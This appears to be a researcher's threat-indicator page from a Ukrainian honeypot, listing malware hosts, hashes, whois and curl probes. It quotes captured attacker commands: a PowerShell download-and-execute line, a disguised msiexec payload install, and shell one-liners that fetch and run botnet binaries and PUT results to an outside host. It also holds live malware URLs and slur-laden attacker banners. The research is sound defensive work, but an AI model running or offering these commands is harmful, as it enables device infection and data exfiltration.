Ukrainian Honeypot ::002:: Threat Indicators // Beacon Servers

Random servers/malware located, and general notes.

Last Updated

Sat Sep 17 23:04:07 2022

Captain John Sheridan

“We have begun a difficult and uncertain journey, and none of us can see its end, but our cause remains a just one. That truth honours and sanctifies our fallen comrades who have made the ultimate sacrifice so that we might carry on the work that is ahead of us. We are gathered here today to honour their memory and their names.”

“May God stand between you and harm in all the empty places where you must walk.”

See Also

(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there's a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)

https://bcable.net/analysis-ukr-prelim.html

https://bcable.net/analysis-ukr-graphs.html

https://bcable.net/analysis-ukr-indicators.html

https://bcable.net/analysis-ukr-ru_map_sessions.html

https://bcable.net/analysis-ukr-cn_map_sessions.html

https://bcable.net/analysis-ukr-miori_fail.html

https://bcable.net/analysis-ukr-botnet_perl.html

https://bcable.net/analysis-ukr-ddos_gh0st.html

Libraries

library(openssl)
## Linking to: OpenSSL 1.1.1k  FIPS 25 Mar 2021 (FIPS)

ClamAV Scan Results

clamscan_hashes <- read.csv("../graphs/clamscan_hashes.csv")
malware_files <- list.files("redacted/malware", recursive=TRUE)
malware_table <- sapply(malware_files, FUN=function(x){
    as.character(sha256(file(paste0("redacted/malware/", x))))
})
malware_sha256 <- data.frame(
    Hash.SHA256=as.vector(malware_table),
    File.Name=names(malware_table)
)
malware_df <- merge(malware_sha256, clamscan_hashes, by="Hash.SHA256")
write.csv(malware_df, "malware_scans.csv", row.names=FALSE)

Manual Explorations

Spotted Random Warning Pages

http://warning.rt.ru/
http://blocked.crimea-com.net/

baidu.honker.info

http://baidu.honker.info:8/86.exe
http://baidu.honker.info:8/iexplore.exe
http://baidu.honker.info:8/c64.exe
GH0STCZHBKV2EWThpYV1dUFlFWTldkeBkcGxtkb1JOZHt2cHd7fHt+a2R7e3VRS1pXW1dOXAgWdk1cCG5aSVVNX1daUwhrd3UTCHtdWFhXWlxke2x1UUtaV1tXTlwIFnZtfA
hJVkwIf1FWTFdfWwiAeAhrd3UTCHFWXE1PWklcUVdWCF9RXFAIe3dpeGQoGH0STC
msiexec /i http://avip.okblcm.co:2650/abYDuh9tfbBfVYg7up.jpg /q
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon OnlinePC"
powershell -nop -c Import-Module .\Ladon.ps1;Ladon OnlinePC
86.exe: Win.Malware.Siscos-6993581-0 FOUND
c64.exe: OK
iexplore.exe: Win.Malware.Temr-7070541-0 FOUND
b993dc56bb1fc2c463120c721e3a390e3c686a0cadb5ae8f725e8c1eb3219461  86.exe
044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763  c64.exe
a5817d0e553b0246e46ac24f15820de0523c69eaa3324631cdd257a75c671be6  iexplore.exe
86.exe: Win.Dropper.Gh0stRAT-6997745-0 FOUND
c64.exe: Win.Malware.Johnnie-6858836-0 FOUND
iexplore.exe: Win.Malware.Temr-7070541-0 FOUND
baidu.honker.info.  600 IN  A   112.175.114.125
$ whois baidu.honker.info
[Querying whois.afilias.net]
[whois.afilias.net]
Malformed request.
>>> Last update of WHOIS database: 2022-03-10T06:25:39Z <<<
$ curl -i http://baidu.honker.info:8
HTTP/1.1 200 OK
Server: MyWebServer/3.6.22 Unicode (By TGY)
Date: Thu, 10 Mar 2022 04:27:54 GMT
Accept-Ranges: bytes
Last-Modified: Fri, 19 Nov 2021 18:36:36 GMT
Content-Type: text/html
Content-Length: 4
ETag: "/:Fri, 19 Nov 2021 18:36:36 GMT"
Connection: Keep-Alive

look

194.242.56.116

194.242.56.116/mirai.x86

Discord ID embedded:

Developers: EcstasyCode#8838

Is this the same guy? (did some searching):

https://genius.com/Ecstasycode-my-botnet-lyrics

My Botnet Lyrics
- prehook (famy)
Fucking best Botnet on the world (yeah, yeah)
Fuck OVH (whoah)

- hook (famy)
My Botnet is fucking best (brother)
My Botnet is fucking best
My Botnet is fucking best
My Botnet (yeah yeah)
Fuck OVH (nanananana)
Fuck OVH (nananananana)
My Botnet is [..] fucking best (nanananananana)
Fuck OVH (nanana)
Fuck OVH (nanananana)

- end (EcstasyCode)
Fuck OVH (nananana)
My Botnet is fucking best
My Botnet is fucking' fucking' fucking' fucking' fucking' best (ay)

[...]

Genius Annotation
1 contributor
Famy and his gang have the best botnet on the world they even know how to fuck your mom

[...]

Genius Annotation
1 contributor
OVH is trash and is burning down so they say fuck OVH.

[...]

Written By
Yinuzo
Release Date
May 16, 2021

23.94.7.175

http://23.94.7.175/.s4y
s4y is a hacker and fucked you mother.
136.144.41.60:3074
[ ] arm  2022-02-10 05:19  41K
[ ] arm6 2022-02-10 05:19  44K
[ ] arm7 2022-02-10 05:19  66K
[ ] m68k 2022-02-10 05:19  99K
[ ] mips 2022-02-10 05:19  43K
[ ] mpsl 2022-02-10 05:19  43K
[ ] ppc  2022-02-10 05:19  40K
[ ] sh4  2022-02-10 05:19  83K
[ ] spc  2022-02-10 05:19  99K
[ ] x86  2022-02-10 05:19  33K
$ curl -i http://141.95.55.167/a5as4d5asd5asd4as5D/
HTTP/1.1 404 Not Found
Date: Thu, 10 Mar 2022 04:14:02 GMT
Server: Apache/2.4.38 (Debian)
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 141.95.55.167 Port 80</address>
</body></html>

178.62.220.66

$ curl -i http://178.62.220.66/k13msmfs2/
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:17:04 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 11 Feb 2022 23:05:25 GMT
ETag: "0-5d7c61a22ec44"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

23.254.247.214

$ curl -i http://23.254.247.214
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:21:32 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

23.94.22.13

$ curl -i http://23.94.22.13/a/
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:24:03 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 22 Feb 2022 12:42:43 GMT
ETag: "22f-5d89aaf6d4267"
Accept-Ranges: bytes
Content-Length: 559
Content-Type: text/html; charset=UTF-8

rm -rf a3; curl http://23.94.22.13/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 2.56.56.43:9832 -T a;

rm -rf a2; curl http://23.94.22.13/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 2.56.56.43:9832 -T b;

rm -rf a1; curl http://23.94.22.13/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 2.56.56.43:9832 -T c;

rm -rf a6; curl http://23.94.22.13/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 2.56.56.43:9832 -T d;

rm -rf a9; curl http://23.94.22.13/mipsel > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 2.56.56.43:9832 -T e;

23.95.0.211

$ curl -i http://23.95.0.211
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:25:17 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

5.188.210.227

$ curl -i http://5.188.210.227
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:31:09 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 21 Mar 2018 19:54:01 GMT
ETag: "604d5-0-567f18d6c0840"
Accept-Ranges: bytes
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

185.156.72.4

$ curl -i http://185.156.72.4:47487
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4353
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.120227481937036; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
Server information HttpFileServer 2.3m
Server time: 2/8/2022 9:07:42 AM
Server uptime: (1 days) 06:27:01

Name.extension        Size        Timestamp       Hits
[IMG] LinkOpener.exe 589.2 KB 1/24/2022 4:59:25 AM 890
inetnum:        185.156.72.0 - 185.156.72.255
netname:        Interhost
country:        NL
admin-c:        ZAM42-RIPE
tech-c:         ZAM42-RIPE
status:         ASSIGNED PA
mnt-by:         ru-ip84-1-mnt
created:        2020-09-24T02:25:57Z
last-modified:  2021-07-15T11:33:57Z
source:         RIPE
org:            ORG-VP68-RIPE

organisation:   ORG-VP68-RIPE
org-name:       TOV VAIZ PARTNER
org-type:       OTHER
address:        KIEV, ADAMA MIRKEVICHA 9 22
abuse-c:        ACRO41012-RIPE
mnt-ref:        ITDELUXE-MNT
mnt-by:         ITDELUXE-MNT
created:        2021-05-08T18:11:03Z
last-modified:  2021-05-17T07:55:40Z
source:         RIPE # Filtered

2.indexsinas.me:811

http://2.indexsinas.me:811/86.exe
http://2.indexsinas.me:811/iexplore.exe
http://2.indexsinas.me:811/c64.exe
$ curl -i http://2.indexsinas.me:811
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 3
Accept-Ranges: bytes
Server: HFS 2.3k
Set-Cookie: HFS_SID_=0.734412468969822; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

123
2.indexsinas.me.    600 IN  A   211.119.107.2
2.indexsinas.me.    600 IN  A   175.206.44.100
2.indexsinas.me.    600 IN  A   223.171.55.115
$ whois 2.indexsinas.me
[Querying whois.nic.me]
[whois.nic.me]
NOT FOUND
>>> Last update of WHOIS database: 2022-03-10T06:25:40Z <<<

360.lcy2zzx.pw:

http://360.lcy2zzx.pw:84/4445.exe
http://360.lcy2zzx.pw:84/testxmr50.exe
http://360.lcy2zzx.pw:84/home.exe
$ curl -i http://360.lcy2zzx.pw:84
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.05098782107234; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

www.google.com
360.lcy2zzx.pw.     600 IN  A   114.202.175.144
$ whois 360.lcy2zzx.pw
[Querying whois.nic.pw]
[whois.nic.pw]
The queried object does not exist: DOMAIN NOT FOUND

bots.infectedfam.cc

$ curl -i http://bots.infectedfam.cc
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:28:43 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
bots.infectedfam.cc.    61  IN  A   23.95.0.211
$ whois bots.infectedfam.cc
[Querying ccwhois.verisign-grs.com]
[ccwhois.verisign-grs.com]
No match for domain "BOTS.INFECTEDFAM.CC".
>>> Last update of WHOIS database: 2022-03-10T06:24:09Z <<<

indonesias.me

$ curl -i http://indonesias.me:9998
HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Sat, 19 Mar 2022 20:03:37 GMT
Content-Length: 1237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Prohibido: acceso denegado.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Error del servidor</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>403 - Prohibido: acceso denegado.</h2>
  <h3>No tiene permiso para ver este directorio o esta p�gina con las credenciales que ha proporcionado.</h3>
 </fieldset></div>
</div>
</body>
</html>
indonesias.me.      300 IN  A   137.74.81.148
indonesias.me.      300 IN  A   39.108.155.143
indonesias.me.      300 IN  A   222.186.137.38
indonesias.me.      300 IN  A   113.200.207.107
indonesias.me.      300 IN  A   211.149.222.28
indonesias.me.      300 IN  A   120.76.245.218
$ whois indonesias.me
[Querying whois.nic.me]
[whois.nic.me]
Domain Name: INDONESIAS.ME
Registry Domain ID: D425500000049923590-AGRS
Registrar WHOIS Server:
Registrar URL:
Updated Date: 2021-07-22T22:24:19Z
Creation Date: 2018-07-22T06:56:51Z
Registry Expiry Date: 2022-07-22T06:56:51Z
Registrar Registration Expiration Date:
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: Hubei/xiaochang/fengshan
Registrant Country: CN
Name Server: RITA.NS.CLOUDFLARE.COM
Name Server: KAI.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2022-03-10T06:20:14Z <<<

ip.ws.126.net

$ curl -i http://ip.ws.126.net
HTTP/1.1 403 Forbidden
Server: nginx
Date: Thu, 10 Mar 2022 04:29:49 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Vary: Accept-Encoding

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>
ip.ws.126.net.      2444    IN  CNAME   ipservice.163.com.
ipservice.163.com.  107 IN  A   59.111.181.52
$ whois ip.ws.126.net
[Querying whois.verisign-grs.com]
[whois.verisign-grs.com]
No match for domain "IP.WS.126.NET".
>>> Last update of whois database: 2022-03-10T06:23:50Z <<<

kevincnc.madafaka.me

kevincnc.madafaka.me.   1800    IN  A   178.62.220.66
$ whois kevincnc.madafaka.me
[Querying whois.nic.me]
[whois.nic.me]
NOT FOUND
>>> Last update of WHOIS database: 2022-03-10T06:22:24Z <<<
$ curl -i http://kevincnc.madafaka.me
HTTP/1.1 200 OK
Date: Thu, 10 Mar 2022 04:30:26 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Fri, 11 Feb 2022 23:05:25 GMT
ETag: "0-5d7c61a22f02c"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

scan.infectedfam.cc:80

scan.infectedfam.cc.    300 IN  A   23.95.0.211
$ whois scan.infectedfam.cc
[Querying ccwhois.verisign-grs.com]
[ccwhois.verisign-grs.com]
No match for domain "SCAN.INFECTEDFAM.CC".
>>> Last update of WHOIS database: 2022-03-10T06:21:55Z <<<
$ curl -i http://scan.infectedfam.cc
HTTP/1.1 403 Forbidden
Date: Thu, 10 Mar 2022 04:31:19 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
$ curl -i http://106.246.224.219
HTTP/1.1 200 OK
Date: Sat, 12 Mar 2022 11:07:36 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 17 Sep 2020 04:59:56 GMT
ETag: "2409b3-695-5af7b41623a17"
Accept-Ranges: bytes
Content-Length: 1685
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<head>
<meta http-equiv="content-type" content="text/html; charset=euc-kr">
<title>(주)디즈넷</title>
<meta name="generator" content="Namo WebEditor v6.0">

</head>

<body bgcolor="white" text="black" link="blue" vlink="purple" alink="red">
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="img4.gif" border="0"></p>
<p><a href="http://www.diznet.co.kr" target="_self"><img src="img9.gif" border="0"></a></p>
<p><a href="http://ezsso.bizmeka.com"><img src="img2.gif" border="0"></a></p>
<p><a href="http://www.diznet.kr:5500"><img src="img3.gif" border="0"></a></p>
<p>&nbsp;</p>
<p align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;이동할 사이트를 클릭하세요.</p>
<p align="left">&nbsp;&nbsp;&nbsp;<img src="img5.gif" border="0"></p>
</body>

</html>

jswl.jdaili.xyz

jswl.jdaili.xyz/jaws

$ curl -i jswl.jdaili.xyz/jaws
HTTP/1.1 404 Not Found
Date: Thu, 17 Mar 2022 20:05:51 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /jaws was not found on this server.</p>
</body></html>
$ whois jswl.jdaili.xyz
[Querying whois.nic.xyz]
[whois.nic.xyz]
The queried object does not exist: DOMAIN NOT FOUND
$ dig jswl.jdaili.xyz
jswl.jdaili.xyz.    542 IN  A   209.141.33.141
$ whois 209.141.33.141
NetRange:       209.141.32.0 - 209.141.63.255
CIDR:           209.141.32.0/19
NetName:        PONYNET-04
NetHandle:      NET-209-141-32-0-1
Parent:         NET209 (NET-209-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS53667
Organization:   FranTech Solutions (SYNDI-5)
RegDate:        2011-01-27
Updated:        2012-03-25
Ref:            https://rdap.arin.net/registry/ip/209.141.32.0


OrgName:        FranTech Solutions
OrgId:          SYNDI-5
Address:        1621 Central Ave
City:           Cheyenne
StateProv:      WY
PostalCode:     82001
Country:        US
RegDate:        2010-07-21
Updated:        2017-01-28
Ref:            https://rdap.arin.net/registry/entity/SYNDI-5

212.192.246.30

SHORELINE BOTNET THA REAL SHIT NIGGA
                             Index of /bins

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       arm              2022-03-13 16:05  85K  
[   ]       arm5             2022-03-13 16:05  61K  
[   ]       arm6             2022-03-13 16:05  93K  
[   ]       arm7             2022-03-13 16:05 161K  
[   ]       i686             2022-03-13 16:05  81K  
[   ]       m68k             2022-03-13 16:05  82K  
[   ]       mips             2022-03-13 16:05  75K  
[   ]       mpsl             2022-03-13 16:05 106K  
[   ]       ppc              2022-03-13 16:05  77K  
[   ]       sh4              2022-03-13 16:05  74K  
[   ]       spc              2022-03-13 16:05  86K  
[   ]       x86              2022-03-13 16:05  73K  
$ curl -i http://212.192.246.30/bins/
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2022 15:40:45 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 3162
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /bins</title>
 </head>
 <body>
<h1>Index of /bins</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a>       </td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arm">arm</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 85K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arm5">arm5</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 61K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arm6">arm6</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 93K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="arm7">arm7</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right">161K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="i686">i686</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 81K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="m68k">m68k</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 82K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="mips">mips</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right"> 75K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="mpsl">mpsl</a>                   </td><td align="right">2022-03-13 16:05  </td><td align="right">106K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="ppc">ppc</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 77K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="sh4">sh4</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 74K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="spc">spc</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 86K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="x86">x86</a>                    </td><td align="right">2022-03-13 16:05  </td><td align="right"> 73K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
inetnum:        212.192.244.0 - 212.192.247.255
netname:        Serverion
country:        NL
org:            ORG-DCB8-RIPE
admin-c:        AA35882-RIPE
tech-c:         TA7409-RIPE
status:         ASSIGNED PA
mnt-by:         RELCOMGROUP-EXT-MNT
created:        2020-10-06T20:25:28Z
last-modified:  2021-05-28T13:59:06Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
phone:          +31851308338
phone:          +13023803902
admin-c:        AA35882-RIPE
tech-c:         TA7409-RIPE
abuse-c:        AR60082-RIPE
mnt-ref:        mnt-nl-descapital-1
mnt-ref:        RELCOMGROUP-EXT-MNT
mnt-ref:        FREENET-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         mnt-nl-descapital-1
created:        2020-03-17T15:00:52Z
last-modified:  2022-03-15T10:56:08Z
source:         RIPE # Filtered
mnt-ref:        AZERONLINE-MNT
mnt-ref:        interlir-mnt

31.210.20.109

$ curl -i http://31.210.20.109
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2022 15:44:04 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 10 Mar 2022 22:21:40 GMT
ETag: "2-5d9e4a361fb00"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html; charset=UTF-8

X
$ curl -i http://31.210.20.109/a/
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2022 15:44:33 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 2186
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /a</title>
 </head>
 <body>
<h1>Index of /a</h1>
<ul><li><a href="/"> Parent Directory</a></li>
<li><a href="76d32be0.sh"> 76d32be0.sh</a></li>
<li><a href="b/"> b/</a></li>
<li><a href="bot.arc"> bot.arc</a></li>
<li><a href="bot.arm"> bot.arm</a></li>
<li><a href="bot.arm5"> bot.arm5</a></li>
<li><a href="bot.arm6"> bot.arm6</a></li>
<li><a href="bot.arm7"> bot.arm7</a></li>
<li><a href="bot.i686"> bot.i686</a></li>
<li><a href="bot.m68k"> bot.m68k</a></li>
<li><a href="bot.mips"> bot.mips</a></li>
<li><a href="bot.mpsl"> bot.mpsl</a></li>
<li><a href="bot.ppc"> bot.ppc</a></li>
<li><a href="bot.rm7"> bot.rm7</a></li>
<li><a href="bot.sh4"> bot.sh4</a></li>
<li><a href="bot.spc"> bot.spc</a></li>
<li><a href="bot.x86"> bot.x86</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arc"> db0fa4b8db0333367e9bda3ab68b8042.arc</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm"> db0fa4b8db0333367e9bda3ab68b8042.arm</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm5"> db0fa4b8db0333367e9bda3ab68b8042.arm5</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm6"> db0fa4b8db0333367e9bda3ab68b8042.arm6</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.arm7"> db0fa4b8db0333367e9bda3ab68b8042.arm7</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.i686"> db0fa4b8db0333367e9bda3ab68b8042.i686</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.m68k"> db0fa4b8db0333367e9bda3ab68b8042.m68k</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.mips"> db0fa4b8db0333367e9bda3ab68b8042.mips</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.mpsl"> db0fa4b8db0333367e9bda3ab68b8042.mpsl</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.ppc"> db0fa4b8db0333367e9bda3ab68b8042.ppc</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.sh4"> db0fa4b8db0333367e9bda3ab68b8042.sh4</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.spc"> db0fa4b8db0333367e9bda3ab68b8042.spc</a></li>
<li><a href="db0fa4b8db0333367e9bda3ab68b8042.x86"> db0fa4b8db0333367e9bda3ab68b8042.x86</a></li>
<li><a href="wget.sh"> wget.sh</a></li>
</ul>
</body></html>

45.90.160.54

inetnum:        45.90.160.0 - 45.90.160.255
netname:        FR-SAPINET-20190625
country:        FR
org:            ORG-SS1190-RIPE
admin-c:        TA8040-RIPE
tech-c:         TA8040-RIPE
status:         ALLOCATED PA
mnt-by:         SAPINET-MNT
mnt-by:         RIPE-NCC-HM-MNT
created:        2021-10-27T08:12:36Z
last-modified:  2021-10-27T08:12:36Z
source:         RIPE

organisation:   ORG-SS1190-RIPE
org-name:       Sapinet SAS
country:        FR
org-type:       LIR
address:        65 rue de la Croix
address:        92000
address:        Nanterre
address:        FRANCE
phone:          +33783049305
admin-c:        TA8040-RIPE
tech-c:         TA8040-RIPE
abuse-c:        AR63279-RIPE
mnt-ref:        SAPINET-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         SAPINET-MNT
created:        2021-06-08T10:29:40Z
